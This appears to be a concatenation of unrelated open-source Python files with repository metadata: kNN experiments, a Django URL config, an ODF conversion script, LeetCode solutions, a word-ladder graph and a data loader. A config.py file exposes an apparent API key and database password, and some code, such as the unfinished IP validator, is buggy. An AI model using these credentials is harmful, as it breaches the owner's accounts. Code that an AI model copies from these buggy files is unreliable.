def chebyshev_iris(t,row):
columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
distance=[]
for index1,row1 in t.iterrows():
max_value=-sys.maxint-1
for col in columns:
if max_value<abs(row1[col]-row[col]):
max_value=abs(row1[col]-row[col])
distance.append((max_value,row1['class']))
distance.sort()
return distance
# In[153]:
def accuracy_cm(df_confusion):
tpptn=0 #tp +tn
for i in df_confusion:
tpptn+=df_confusion[i][i]
total=0
for i in df_confusion:
total+=df_confusion[i].sum()
return float(tpptn)/total
# In[154]:
def precision_cm(df_confusion):
return np.sum(np.diag(df_confusion)/ np.sum(df_confusion, axis = 0))/len(np.diag(df_confusion)/ np.sum(df_confusion, axis = 0))
# In[155]:
def recall_cm(df_confusion):
#macro-averaged recall: mean over classes of diagonal / row (actual) totals
return np.mean(np.diag(df_confusion) / np.sum(df_confusion, axis = 1))
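#Worked example (illustrative numbers only): for a 2x2 crosstab [[50, 10], [5, 35]]
#with rows = Actual and columns = Predicted, np.diag(...) = [50, 35] and the
#column sums are [55, 45], so macro precision = mean(50/55, 35/45) ~= 0.843.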
# In[156]:
def f1Score_cm(precision,recall):
return float(2)/((1/recall)+(1/precision))
# In[157]:
#calculate accuracy for training data t and a given distance function func
def calculate_accuracy_iris(t,func,validate):
l=len(t)
l=int(math.sqrt(l))
l+=1
#for plotting graph
k_level=[]
accu_list=[]
max_acc=-sys.maxint-1
final_k=0
max_prec=0
max_recall=0
max_f1sc=0
#range of k is from 1 to square root of the number of rows of training data set provided
for i in range(1,l): #try every k from 1 up to sqrt(n); note the class label has 3 unique values
#for confusion matrix
actual_value=[]
predicted_value=[]
#for each row in validate
for index,row in validate.iterrows():
x=predict_iris(row,i,t,func)
#for confusion matrix
actual_value.append(row['class'])
predicted_value.append(x)
actu = pd.Series(actual_value, name='Actual')
pred = pd.Series(predicted_value, name='Predicted')
df_confusion = pd.crosstab(actu, pred)
acc_cm=accuracy_cm(df_confusion)
preci_cm=precision_cm(df_confusion)
recal_cm=recall_cm(df_confusion)
f1_sc=f1Score_cm(preci_cm,recal_cm)
#to plot the graph between different k values and its corresponding accuracy
k_level.append(i)
accu_list.append(acc_cm)
if max_acc<acc_cm:
#remember the metrics achieved at the best k so far
max_acc=acc_cm
final_k=i
max_prec=preci_cm
max_recall=recal_cm
max_f1sc=f1_sc
return (k_level,accu_list,final_k,max_acc,max_prec,max_recall,max_f1sc)
# # q-1-1-1
# # Accuracy, Precision, Recall, k-value and F1 score
# In[158]:
print "*******ROBOT1*******"
print
print "Eucledian"
print
print "k_value: ",k1
print "max accuracy: ",acc1
print "precision: ",pre1
print "recall: ",recal1
print "f1 score: ",f1sc1
print
print "chebyshev"
print
print "k_value: ",k2
print "max accuracy: ",acc2
print "precision: ",pre2
print "recall: ",recal2
print "f1 score: ",f1sc2
print
print "manhattan"
print
print "k_value: ",k3
print "max accuracy: ",acc3
print "precision: ",pre3
print "recall: ",recal3
print "f1 score: ",f1sc3
print
# In[159]:
print "*******ROBOT2*******"
print
print "Eucledian"
print
print "k_value: ",k11
print "max accuracy: ",acc11
print "precision: ",pre11
print "recall: ",recal11
print "f1 score: ",f1sc11
print
print "chebyshev"
print
print "k_value: ",k22
print "max accuracy: ",acc22
print "precision: ",pre22
print "recall: ",recal22
print "f1 score: ",f1sc1
print
print "manhattan"
print
print "k_value: ",k33
print "max accuracy: ",acc33
print "precision: ",pre33
print "recall: ",recal33
print "f1 score: ",f1sc33
print
# In[160]:
#IRIS
k1_listi,accu1i,k1i,acc1i,prec1i,recal1i,f1sc1i=calculate_accuracy_iris(train,euclidean_iris,validate)
k2_listi,accu2i,k2i,acc2i,prec2i,recal2i,f1sc2i=calculate_accuracy_iris(train,chebyshev_iris,validate)
k3_listi,accu3i,k3i,acc3i,prec3i,recal3i,f1sc3i=calculate_accuracy_iris(train,manhattan_iris,validate)
# In[161]:
print "*******IRIS*******"
print
print "Eucledian"
print
print "k: ",k1i
print "max accuracy: ",acc1i
print "precision: ",prec1i
print "recall: ",recal1i
print "f1 Score: ",f1sc1i
print
print "chebyshev"
print
print "k: ",k2i
print "max accuracy: ",acc2i
print "precision: ",prec2i
print "recall: ",recal2i
print "f1 Score: ",f1sc2i
print
print "manhattan"
print
print "k: ",k3i
print "max accuracy: ",acc3i
print "precision: ",prec3i
print "recall: ",recal3i
print "f1 Score: ",f1sc3i
print
# # q-1-1-2
# # Graphs for Euclidean, Chebyshev and Manhattan
# In[162]:
fig,axes=plt.subplots(figsize=(7,7))
axes.plot(k1_list,accu1,label=r"$Euclidean$")
axes.plot(k2_list,accu2,label=r"$Chebyshev$")
axes.plot(k3_list,accu3,label=r"$Manhattan$")
legend=axes.legend(loc='best')
axes.set_title('Robot 1')
plt.xlabel('k values')
plt.ylabel('accuracy')
# In[163]:
fig,axes=plt.subplots(figsize=(7,7))
axes.plot(k11_list,accu11,label=r"$Euclidean$")
axes.plot(k22_list,accu22,label=r"$Chebyshev$")
axes.plot(k33_list,accu33,label=r"$Manhattan$")
legend=axes.legend(loc='best')
axes.set_title('Robot 2')
plt.xlabel('k values')
plt.ylabel('accuracy')
# In[164]:
fig,axes=plt.subplots(figsize=(7,7))
axes.plot(k1_listi,accu1i,label=r"$Euclidean$")
axes.plot(k2_listi,accu2i,label=r"$Chebyshev$")
axes.plot(k3_listi,accu3i,label=r"$Manhattan$")
legend=axes.legend(loc='best')
axes.set_title('Iris')
plt.xlabel('k values')
plt.ylabel('accuracy')
# # Test file
# # For robot1
# In[165]:
testfile=raw_input("Test File: ")
colnames=[ 'a1', 'a2', 'a3','a4','a5','a6','Id']
test = pd.read_csv(testfile, sep=' ', names=colnames,skipinitialspace=True)
test=normalise(test)
for index,row in test.iterrows():
print predict(row,3,train1,euclidean)
# # For iris
# In[166]:
testiris=raw_input("Test File: ")
colnames_iris=['sepal_length', 'sepal_width', 'petal_length', 'petal_width','class']
testi = pd.read_csv(testiris, sep=',', names=colnames_iris,skipinitialspace=True)
testi=normalise_iris(testi)
for index,row in testi.iterrows():
print predict_iris(row,7,train,euclidean_iris)
# # Comparison With Scikit-learn
# In[167]:
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
# In[168]:
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
# In[169]:
def compareScikit(df,target,identifier=None):
le = preprocessing.LabelEncoder()
# df[identifier] = le.fit_transform(df[identifier])
if identifier is not None:
df[identifier] = le.fit_transform(df[identifier])
# dataset_R1=dataset_R1.drop('index',1)
cols = [col for col in df.columns if col not in [target,identifier]]
data=df[cols]
target=df[target]
data_train, data_test, target_train, target_test = train_test_split(data,target, test_size = 0.20, random_state = 10)
scaler = StandardScaler()
scaler.fit(data_train)
data_train = scaler.transform(data_train)
data_test = scaler.transform(data_test)
classifier = KNeighborsClassifier(n_neighbors=5)
classifier.fit(data_train, target_train)
y_pred = classifier.predict(data_test)
error = []
l=len(df)
l=int(math.sqrt(l))
l+=1
for i in range(1, l):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(data_train, target_train)
pred_i = knn.predict(data_test)
error.append(np.mean(pred_i != target_test))
plt.figure(figsize=(7, 7))
plt.plot(range(1, l), error, color='red', linestyle='dashed', marker='o',
markerfacecolor='blue', markersize=10)
plt.title('Error Rate K Value')
plt.xlabel('K Value')
plt.ylabel('Mean Error')
score = accuracy_score(target_test, y_pred)
print("score",score)
# # Robot 1
# In[170]:
compareScikit(robot1,'class','Id')
# # Robot 2
# In[171]:
compareScikit(robot2,'class','Id')
# # Iris
# In[172]:
compareScikit(data,'class',None)
# # Possible reasons for better performance
# 1) kNN is a lazy learner: there is no real training phase (fitting only stores/indexes the data), so no extra time is spent on training.
#
#
# 2) kNN is non-parametric: it makes no assumption about the underlying data distribution.
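# A minimal sketch of the "lazy learner" point above (added for illustration,
# not part of the original assignment; the dataset and k=5 are arbitrary and
# scikit-learn >= 0.18 is assumed): fitting KNeighborsClassifier is nearly
# instant because it only indexes the training data, while almost all of the
# work happens at predict time.
import time
from sklearn.neighbors import KNeighborsClassifier
from sklearn.datasets import load_iris
X_demo, y_demo = load_iris(return_X_y=True)
knn_demo = KNeighborsClassifier(n_neighbors=5)
t0 = time.time(); knn_demo.fit(X_demo, y_demo); t_fit = time.time() - t0
t0 = time.time(); knn_demo.predict(X_demo); t_pred = time.time() - t0
print("fit: %.6fs, predict: %.6fs" % (t_fit, t_pred))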
|
[
"prabha.pandey.iiith@gmail.com"
] |
prabha.pandey.iiith@gmail.com
|
02213e4a2e6da7ecce759935c4b8ca0ee895f692
|
1a2b7aa4db8f36fcabb7093d4a5120a8ce3fa57e
|
/nanalib/nanalib/nanalib/doctype/author/test_author.py
|
42da2bd908bf25cc1ffd9bca4be4c90df0ff0b8a
|
[
"MIT"
] |
permissive
|
mohamedhafezqo/nana_library
|
3722dfe4b345da3064f22f3aa75951aaedd848ee
|
d429b2a1f2af4ba988e96c86e39985c19b8ffb51
|
refs/heads/master
| 2022-04-14T13:13:47.312671
| 2020-04-16T13:18:17
| 2020-04-16T13:18:17
| 256,219,958
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020, nana and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestAuthor(unittest.TestCase):
pass
|
[
"mohamed.hafezqo@gmail.com"
] |
mohamed.hafezqo@gmail.com
|
12965f0d92a6486ae33f800cf7b821d5ddd92a07
|
0d6820aa4958aff7ff083aaa78e899b70d201c73
|
/src_docker_version/imdb_clone/imdb_clone/urls.py
|
1edce63ea2d3db9ed13fd05f0ef1d908aa887a8b
|
[] |
no_license
|
ramankumarrudr/ImdbClone_DeltaX
|
e15ccd363b14be74fd49ade873a8ce061e50bdf5
|
b789da271eaad6fb0866e55d60ad61e230f56db5
|
refs/heads/master
| 2023-04-30T13:09:54.225152
| 2019-08-12T12:42:04
| 2019-08-12T12:42:04
| 199,679,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
from django.contrib import admin
from django.urls import path,re_path
from django.urls import include
from django.conf.urls import url
from app import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.index,name='index'),
re_path(r'^tvshow/$', views.tvshows,name='tvshow'),
re_path(r'^actor/$', views.actor_images,name='actor'),
re_path(r'^exit/$', views.formexit,name='exit'),
re_path(r'^form/$',views.post,name='form'),
re_path(r'^showform/$',views.post_tvshow,name='show_form'),
re_path(r'^actor-form/$',views.actor,name='actor_form'),
re_path(r'^form/(?P<id>\d+)/edit/$',views.movie_update,name="update"),
re_path(r'^index/(?P<id>\d+)/delete/$',views.movie_delete,name="delete"),
re_path(r'^showform/(?P<id>\d+)/edit/$',views.tvshow_update,name="update_tvshow"),
re_path(r'^tvshow/(?P<id>\d+)/delete/$',views.tvshow_delete,name="delete_tvshow"),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
[
"ramankumar.rudr@gmail.com"
] |
ramankumar.rudr@gmail.com
|
8366171b9a7ff4af419cd587e13a7454da48da19
|
8ad6662c4fa0755d33a0cf62ddc50b3815e870a0
|
/venv/bin/odf2xml
|
9e26999219b30a41cc49d95be21f3ce36a2d4bc6
|
[] |
no_license
|
xarala221/gestion-parrainage
|
1dea1aabadb8049ea64e716c30c8ff4e3208a001
|
6efebaa7271a0c6644e0b868877ca71630b4e455
|
refs/heads/master
| 2020-04-05T02:11:29.592504
| 2018-11-07T19:31:26
| 2018-11-07T19:31:26
| 156,467,445
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,493
|
#!/home/hackerpro/projects/2019/parrainage/venv/bin/python3
# -*- coding: utf-8 -*-
# Copyright (C) 2008 Søren Roug, European Environment Agency
#
# This is free software. You may redistribute it under the terms
# of the Apache license and the GNU General Public License Version
# 2 or at your option any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
#
# OpenDocument can be a complete office document in a single
# XML document. This script will create such a document.
import sys, getopt, base64
from odf.opendocument import load
from odf.draw import Image, ObjectOle
from odf.style import BackgroundImage
from odf.text import ListLevelStyleImage
from odf.office import BinaryData
if sys.version_info[0]==3: unicode=str
def usage():
sys.stderr.write("Usage: %s [-e] [-o outputfile] [inputfile]\n" % sys.argv[0])
if __name__ == "__main__":
embedimage = False
try:
opts, args = getopt.getopt(sys.argv[1:], "o:e", ["output="])
except getopt.GetoptError:
usage()
sys.exit(2)
outputfile = '-'
for o, a in opts:
if o in ("-o", "--output"):
outputfile = a
if o == '-e':
embedimage = True
if len(args) > 1:
usage()
sys.exit(2)
if len(args) == 0:
d = load(sys.stdin)
else:
d = load(unicode(args[0]))
if embedimage:
images = d.getElementsByType(Image) + \
d.getElementsByType(BackgroundImage) + \
d.getElementsByType(ObjectOle) + \
d.getElementsByType(ListLevelStyleImage)
for image in images:
href = image.getAttribute('href')
if href and href[:9] == "Pictures/":
p = d.Pictures[href]
bp = base64.encodebytes(p[1])  # base64.encodestring was removed in Python 3.9
image.addElement(BinaryData(text=bp))
image.removeAttribute('href')
xml = d.xml()
if outputfile == '-':
print (xml)
else:
open(outputfile,"wb").write(xml)
# Local Variables: ***
# mode: python ***
# End: ***
|
[
"xaralaxarala@gmail.com"
] |
xaralaxarala@gmail.com
|
|
dce2a94fb0ea75fa40eb112d0bb3937eb37b2d3c
|
9e831c0defd126445772cfcee38b57bfd8c893ca
|
/code/questions/241~250_/246.py
|
f54c941a608497cd2b46602faf9664a20fa052a7
|
[] |
no_license
|
m358807551/Leetcode
|
66a61abef5dde72250d032b7ea06feb3f2931d54
|
be3f037f6e2057a8f2acf9e820bbbbc21d7aa1d2
|
refs/heads/main
| 2023-04-22T15:13:43.771145
| 2021-05-07T06:47:13
| 2021-05-07T06:47:13
| 321,204,181
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
"""
https://leetcode-cn.com/problems/strobogrammatic-number/
"""
class Solution(object):
def isStrobogrammatic(self, num):
"""
:type num: str
:rtype: bool
"""
left, right = 0, len(num)-1
while left < right:
if num[left]+num[right] not in '00 11 88 69 96'.split():
return False
left += 1
right -= 1
return num[left] in '018' if left == right else True
print(
)
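# Example usage (illustrative, not part of the original file):
# s = Solution()
# print(s.isStrobogrammatic("69"))   # True: rotated 180 degrees it still reads "69"
# print(s.isStrobogrammatic("962"))  # False: "2" has no valid rotated counterpart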
|
[
"m358807551@163.com"
] |
m358807551@163.com
|
cac2631608240c84ba8954024d8ea505c9f2951c
|
9845e9a4616f9bd2e55996507bf96d47d7553d8c
|
/Shirley/Notebooks and Resources/config.py
|
6eec9eff508eb0a25f4f932c8bbf659434834eff
|
[] |
no_license
|
suealexa/Plane_project
|
28e26ca728077f97801a508f511a2643b4a75129
|
d55f0f3759804530d365cdb03f300871c6317490
|
refs/heads/master
| 2020-12-19T21:56:30.461197
| 2020-01-23T19:02:46
| 2020-01-23T19:02:46
| 235,864,572
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
api_key = 'AIzaSyBoe3QXczQK_5R-ivDFVgVH0a_3GDxnXfI'
username = 'postgres'
password = 'Learn2019!'
|
[
"noreply@github.com"
] |
suealexa.noreply@github.com
|
d9872a8513d7495f66afca7c52f6b105ad784190
|
955773323446846eff0fbd4e9d3e3a543226f6db
|
/SomeProject/FaceDetection/get_date.py
|
a546924631b028235eb51789a59528d3b7a1ddd8
|
[] |
no_license
|
zhxing001/ML_DL
|
94d8aa64a459b4d257efefe160dac7fb5433e91e
|
6c6a0a42f52d7d392dc844aa94306221c52e319a
|
refs/heads/master
| 2021-07-15T20:14:16.976797
| 2018-10-31T02:42:55
| 2018-10-31T02:42:55
| 135,117,665
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,970
|
py
|
def get_date_and_label():
import matplotlib.pyplot as plt
#读入数据和标签,我存了一份JPG格式的,但是这样存储是有问题的,matlab三通道拉长的话是
#一个通道连续存储,而python是一个位置三个通道连续存储。所以最后还是改用mat型存储
#==============================================================================
# train_img=cv2.imread('train_img.jpg',0)
# train_label=cv2.imread('train_label.jpg',0)
# test_img=cv2.imread('test_img.jpg',0)
# test_label=cv2.imread('test_label.jpg',0)
#
# train_img_reshape=np.reshape(train_img,[-1,64,64,3])
# plt.imshow(train_img_reshape[1])
#
#==============================================================================
import scipy.io as sio
#使用scipy.io来加载mat文件,还是挺好用的
train_img_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/train_img1.mat')
train_img=train_img_mat['train_img_rz']
train_label_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/train_label1.mat')
train_label=train_label_mat['train_labels']
test_img_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/test_img1.mat')
test_img=test_img_mat['test_img_rz']
test_label_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/test_label1.mat')
test_label=test_label_mat['test_labels']
return train_img,train_label,test_img,test_label
#=====测试下数据对不对,看来是没有问题的=========================================================================
# for i in range(0,15):
# img=train_img[i,:,:,:]
# plt.figure()
# plt.imshow(img)
# plt.title(train_label[i])
#
#==============================================================================
#==============================================================================
# for i in range(0,15):
# img=test_img[i,:,:,:]
# plt.figure()
# plt.imshow(img)
# plt.title(test_label[i])
#==============================================================================
|
[
"zhxing_cas@163.com"
] |
zhxing_cas@163.com
|
890dc7e724af48f6a0735079ff1f93c895ef6d0e
|
35d8b4775d24dd013fac07a8cfd2b672a4ec925e
|
/724. Find Pivot Index.py
|
5d55381dd6d72dcaa4aa76b0a401f22bf8530f4f
|
[] |
no_license
|
melekoktay/Leetcode-Practice
|
a6aba796a1dd9bd239ff64db010c086079c2218f
|
d181f2075c6c3881772dfbf54df3ac3390936079
|
refs/heads/master
| 2022-12-21T07:00:37.086434
| 2020-10-12T22:40:34
| 2020-10-12T22:40:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,515
|
py
|
'''
724. Find Pivot Index
Given an array of integers nums, write a method that returns the "pivot" index of this array.
We define the pivot index as the index where the sum of the numbers to the left of the index is equal to the sum of the numbers to the right of the index.
If no such index exists, we should return -1. If there are multiple pivot indexes, you should return the left-most pivot index.
Example 1:
Input:
nums = [1, 7, 3, 6, 5, 6]
Output: 3
Explanation:
The sum of the numbers to the left of index 3 (nums[3] = 6) is equal to the sum of numbers to the right of index 3.
Also, 3 is the first index where this occurs.
Example 2:
Input:
nums = [1, 2, 3]
Output: -1
Explanation:
There is no index that satisfies the conditions in the problem statement.
Note:
The length of nums will be in the range [0, 10000].
Each element nums[i] will be an integer in the range [-1000, 1000].
'''
from tools import timing
class Solution:
@timing
def pivotIndex(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
        # no early exit on short input: even a length-1 array can have a pivot (e.g. [0] -> 0)
left_sum = 0
right_sum = sum(nums)
for i, num in enumerate(nums):
right_sum -= num
if left_sum == right_sum:
return i
left_sum += num
return -1
nums = [1, 2, 3]
nums2 = [1, 7, 3, 6, 5, 6]
print nums
print Solution().pivotIndex(nums)
print nums2
sol = Solution()
print sol.pivotIndex(nums2)
|
[
"buaaluqiang@hotmail.com"
] |
buaaluqiang@hotmail.com
|
87caa856e0d6cc766fc6a3ffde69398715dc4ac3
|
dc66af3b1640f2748c13fbc3802a5855f9b6ae01
|
/Project Implementation/ML_DL/Count_no_of_coins/Iishi/object_detection_edge.py
|
bfa52532d1337ce2e3f6dea02a8e7eaa8e8af260
|
[] |
no_license
|
jerelyn-premjit/Dawn
|
a9629e7eaafd7c43313e530bc6efa98eb46595a1
|
7cf9cc0509e5f965cede7e36066014f0d3e818df
|
refs/heads/master
| 2022-01-07T09:50:37.850846
| 2019-04-17T14:08:30
| 2019-04-17T14:08:30
| 184,249,330
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
import cv2
img = cv2.imread('coins.png')
bilateral_filtered_image = cv2.bilateralFilter(img, 5, 175, 175)
edge_detected_image = cv2.Canny(bilateral_filtered_image, 75, 200)
cv2.imshow('Edge', edge_detected_image)
cv2.waitKey(0)
contours,h = cv2.findContours(edge_detected_image,1,2)
for cnt in contours:
cv2.drawContours(img,[cnt],0,(0,255,0),1)
cv2.imshow('Objects Detected',img)
cv2.waitKey(0)
|
[
"iishipatel@gmail.com"
] |
iishipatel@gmail.com
|
d83ead9269308088dace0d3a4793ea36908e4b40
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/valid_20200616215224.py
|
a3e2a3055cb4ab737c0f457a39c3d13fdc34ef94
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,261
|
py
|
# IPv4 --> 4 decimal numbers, each between 0 and 255
# leading zeros are invalid
# check whether each part is a digit between 0 and 255
import string
def valid(str):
    if str == "":
        return "Neither"
    if str[len(str)-1] == ":" or str[len(str)-1] == ".":
        return "Neither"
    address = str.split(".")
    numbers = range(0,256)
    if len(address) == 4:
        for a in address:
            if a.isdigit() == False:
                return "Neither"
            if int(a) not in numbers:
                return "Neither"
            if len(a) > 1 and a[0] == "0":  # leading zeros are invalid
                return "Neither"
        return "IPv4"
    newAddress = str.split(":")
    if len(newAddress) != 8:
        return "Neither"
    for group in newAddress:
        if group == "" or len(group) > 4:
            return "Neither"
        if not all(c in string.hexdigits for c in group):
            return "Neither"
    return "IPv6"
print(valid("12..33.4"))
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
3fc6eb8ea204b5fd78b064ff2167321ea6e5d64d
|
7998938fd5d56c01f6053883b6b2faeeb9f77465
|
/test/test_result_code.py
|
105c6a1a911a2527518863042fb31179b797da0d
|
[] |
no_license
|
jasonsemko/swagger
|
d87b7fe16aff701e1e6f4446f272a5fd8fc4bb01
|
23e1b837cf2f384731933ac5bf6bd90d5e1b290e
|
refs/heads/master
| 2020-06-24T15:20:57.586047
| 2017-07-11T22:49:48
| 2017-07-11T22:49:48
| 96,943,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,211
|
py
|
# coding: utf-8
"""
AvaTax REST API
    The AvaTax REST API exposes the most commonly used APIs available for interacting with the AvaTax service, allowing calculation of tax, modification of documents, and validation of addresses. If you're unsure of which API to use, a full comparison of the differences between the functionality provided by our REST and SOAP interfaces is documented [here](http://developer.avalara.com/avatax/soap-or-rest/). The [SOAP API reference](http://developer.avalara.com/avatax/api-reference/tax/soap) is also available.
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.result_code import ResultCode
class TestResultCode(unittest.TestCase):
""" ResultCode unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testResultCode(self):
"""
Test ResultCode
"""
model = swagger_client.models.result_code.ResultCode()
if __name__ == '__main__':
unittest.main()
|
[
"jasonsemko@gmail.com"
] |
jasonsemko@gmail.com
|
fe5d5716001ab8bdc4208658dae4a013ef944713
|
18b67c9db2ba65b68e3efbf7133b92cc3fb6cc2b
|
/setup.py
|
fb9a7e719bf40fcf631821217e0075e5515cf606
|
[] |
no_license
|
Abbie-gz/cicd-demo-v5
|
153557af920849a8475b4a3b7f73012078d5e835
|
ce0634261e677135db3280be58ab9ccce022be5e
|
refs/heads/main
| 2023-06-03T05:34:23.098949
| 2021-07-01T14:33:51
| 2021-07-01T14:33:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
from setuptools import find_packages, setup
from cicd_demo_2 import __version__
setup(
name="cicd_demo_2",
packages=find_packages(exclude=["tests", "tests.*"]),
setup_requires=["wheel"],
version=__version__,
description="Databricks Labs CICD Templates Sample Project",
author="",
)
|
[
"ypyabby@163.com"
] |
ypyabby@163.com
|
a346f70258b827ad3d297c165e834c474f52f801
|
08175e7b7f96316b183e1e86cca238bb5305ae8d
|
/words_len5_edited_dist.py
|
3554be5737960d60db6458f9af749fa19a9b8e92
|
[
"BSD-3-Clause"
] |
permissive
|
GrahamAtkinson035/lab8_word-ladders
|
32215792f2022d7a554000fd0f6b8a3526d6a303
|
cab5c794be5a869c337e25adb73f3f89c4a3f63e
|
refs/heads/master
| 2021-01-16T22:39:28.438457
| 2016-02-08T15:39:15
| 2016-02-08T15:39:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,199
|
py
|
"""
Words/Ladder Graph
------------------
Generate an undirected graph over the 5757 5-letter words in the
datafile words_dat.txt.gz. Two words are connected by an edge
if they differ in one letter, resulting in 14,135 edges. This example
is described in Section 1.1 in Knuth's book [1]_,[2]_.
References
----------
.. [1] Donald E. Knuth,
"The Stanford GraphBase: A Platform for Combinatorial Computing",
ACM Press, New York, 1993.
.. [2] http://www-cs-faculty.stanford.edu/~knuth/sgb.html
"""
__author__ = """\n""".join(['Aric Hagberg (hagberg@lanl.gov)',
'Brendt Wohlberg',
'hughdbrown@yahoo.com'])
# Copyright (C) 2004-2015 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import networkx as nx
#-------------------------------------------------------------------
# The Words/Ladder graph of Section 1.1
#-------------------------------------------------------------------
def anagrams(word):
if len(word) < 2:
return word
else:
tmp = []
for i, letter in enumerate(word):
for j in anagrams(word[:i]+word[i+1:]):
tmp.append(j+letter)
return tmp
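# e.g. anagrams('abc') -> ['cba', 'bca', 'cab', 'acb', 'bac', 'abc']: all 3! = 6
# permutations. edit_distance_one below therefore also links each word to the
# anagrams of its one-letter variants, which is what distinguishes this script
# from the plain words-ladder example.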
def generate_graph(words):
from string import ascii_lowercase as lowercase
G = nx.Graph(name="words")
lookup = dict((c,lowercase.index(c)) for c in lowercase)
def edit_distance_one(word):
for i in range(len(word)):
left, c, right = word[0:i], word[i], word[i+1:]
j = lookup[c] # lowercase.index(c)
for cc in lowercase[j+1:]:
ana_word = left + cc + right
ana_list = anagrams(ana_word)
for ana in ana_list:  # avoid reusing the outer loop variable i
yield ana
candgen = ((word, cand) for word in sorted(words)
for cand in edit_distance_one(word) if cand in words)
G.add_nodes_from(words)
for word, cand in candgen:
G.add_edge(word, cand)
return G
def words_graph():
"""Return the words example graph from the Stanford GraphBase"""
import gzip
fh=gzip.open('words_dat.txt.gz','r')
words=set()
for line in fh.readlines():
line = line.decode()
if line.startswith('*'):
continue
w=str(line[0:5])
words.add(w)
return generate_graph(words)
if __name__ == '__main__':
from networkx import *
G=words_graph()
print("Loaded words_dat.txt containing 5757 five-letter English words.")
print("Two words are connected if they differ in one letter in any position.")
print("Graph has %d nodes with %d edges"
%(number_of_nodes(G),number_of_edges(G)))
print("%d connected components" % number_connected_components(G))
for (source,target) in [('chaos','order'),
('nodes','graph'),
('pound','marks')]:
print("Shortest path between %s and %s is"%(source,target))
try:
sp=shortest_path(G, source, target)
for n in sp:
print(n)
except nx.NetworkXNoPath:
print("None")
|
[
"themesta@gmail.com"
] |
themesta@gmail.com
|
de1f9e1c256a8eb9c3c61a0f88aea6549d4cadbe
|
e61e78c9f616bafe7a64d77e43fe46f0385f93f8
|
/listDemo.py
|
ea980835174a94a92fe80efb9af941e912a0c14c
|
[] |
no_license
|
dafaWang/myPythonDemo
|
6fb3ad3c3cebcc0f5b2d5c3f2e445efa5fe2ee33
|
859160fb227a3bbde383ef1c01fc4b61d574e451
|
refs/heads/master
| 2021-01-20T16:22:01.096182
| 2017-05-11T09:53:41
| 2017-05-11T09:53:41
| 90,835,363
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
p1 = input('Please enter the 1st number: ')
p2 = input('Please enter the 2nd number: ')
p3 = input('Please enter the 3rd number: ')
p4 = input('Please enter the 4th number: ')
p5 = input('Please enter the 5th number: ')
mList = [p1,p2,p3,p4,p5]
print('The current list is %s' %mList)
print('The 3rd number is: %s'%mList[2])
print('The last number is: %s'%mList[-1])
p6 = input('Please enter a number to append: ')
mList.append(p6)
print('The latest list is: %s' %mList)
p7 = input('Please enter a number to insert: ')
index1 = input('Choose an insert position, >= 0 and <= %s'%len(mList))
mList.insert(int(index1),p7)
print('The latest list is: %s'%mList)
index2 = input("Choose the position of a number to delete, >= 0 and < %s" %len(mList))
mList.pop(int(index2))
print('The latest list is: %s'%mList)
|
[
"mocen_dafa@163.com"
] |
mocen_dafa@163.com
|
424419177c915e19bc48bf256f83929f73ac7213
|
3186e93270607285bbe8bde229ea454ffec58935
|
/venv/bin/f2py3.7
|
eda1f7254ba66bfc6d31f322c9ad2bf7819455bb
|
[] |
no_license
|
suryanuj/stock-comparisons
|
